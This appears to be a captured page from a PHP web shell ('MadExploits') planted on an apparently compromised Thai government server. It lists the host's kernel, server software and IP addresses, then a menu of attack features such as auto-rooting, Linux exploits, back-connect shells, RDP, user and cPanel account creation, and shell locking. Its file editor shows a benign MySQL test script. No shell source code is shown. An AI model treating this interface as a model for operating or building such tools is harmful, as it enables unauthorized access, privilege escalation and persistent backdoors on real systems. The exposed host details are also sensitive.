Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
funcs_1 /
datadict /
[ HOME SHELL ]
Name
Size
Permission
Action
basics_mixed1.inc
1.92
KB
-rw-r--r--
basics_mixed2.inc
2.21
KB
-rw-r--r--
basics_mixed3.inc
1.95
KB
-rw-r--r--
columns.inc
2.73
KB
-rw-r--r--
datadict.pre
2.08
KB
-rw-r--r--
datadict_bug_12777.inc
1.8
KB
-rw-r--r--
datadict_load.inc
4.16
KB
-rw-r--r--
datadict_priv.inc
3.33
KB
-rw-r--r--
is_key_column_usage.inc
14.01
KB
-rw-r--r--
is_routines.inc
18.85
KB
-rw-r--r--
is_schemata.inc
10.82
KB
-rw-r--r--
is_table_query.inc
1.29
KB
-rw-r--r--
is_tables.inc
18.28
KB
-rw-r--r--
is_triggers.inc
10.45
KB
-rw-r--r--
is_views.inc
11.8
KB
-rw-r--r--
processlist_priv.inc
22.16
KB
-rw-r--r--
processlist_val.inc
17.23
KB
-rw-r--r--
statistics.inc
1.61
KB
-rw-r--r--
table_constraints.inc
1.42
KB
-rw-r--r--
tables.inc
1.73
KB
-rw-r--r--
tables1.inc
1.15
KB
-rw-r--r--
tables2.inc
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tables.inc
# suite/funcs_1/datadict/tables.inc # # Auxiliary script to be sourced by # is_tables_<engine>.test # # The variable $engine_type has to be assigned before sourcing ths script. # # Author: # 2008-06-04 mleich Create this script based on older scripts and new code. # # Just have some tables within different databases. --disable_warnings DROP DATABASE IF EXISTS test1; DROP DATABASE IF EXISTS test2; --enable_warnings CREATE DATABASE test1; CREATE DATABASE test2; --replace_result $engine_type <engine_to_be_used> eval CREATE TABLE test1.t1 (f1 VARCHAR(20)) ENGINE = $engine_type; --replace_result $engine_type <engine_to_be_used> eval CREATE TABLE test1.t2 (f1 VARCHAR(20)) ENGINE = $engine_type; --replace_result $engine_type <engine_to_be_used> eval CREATE TABLE test2.t1 (f1 VARCHAR(20)) ENGINE = $engine_type; --source suite/funcs_1/datadict/tables2.inc SHOW TABLES FROM test1; SHOW TABLES FROM test2; # Create a low privileged user. # Note: The database db_datadict is just a "home" for the low privileged user # and not in the focus of testing. --error 0,ER_CANNOT_USER DROP USER testuser1@localhost; CREATE USER testuser1@localhost; GRANT SELECT ON test1.* TO testuser1@localhost; --echo # Establish connection testuser1 (user=testuser1) --replace_result $MASTER_MYPORT MYSQL_PORT $MASTER_MYSOCK MYSQL_SOCK connect (testuser1,localhost,testuser1,,test1); --source suite/funcs_1/datadict/tables2.inc SHOW TABLES FROM test1; # The lowprivileged user testuser1 will get here an error. --disable_abort_on_error SHOW TABLES FROM test2; --enable_abort_on_error --echo # Switch to connection default and close connection testuser1 connection default; disconnect testuser1; DROP USER testuser1@localhost; DROP DATABASE test1; DROP DATABASE test2;
Close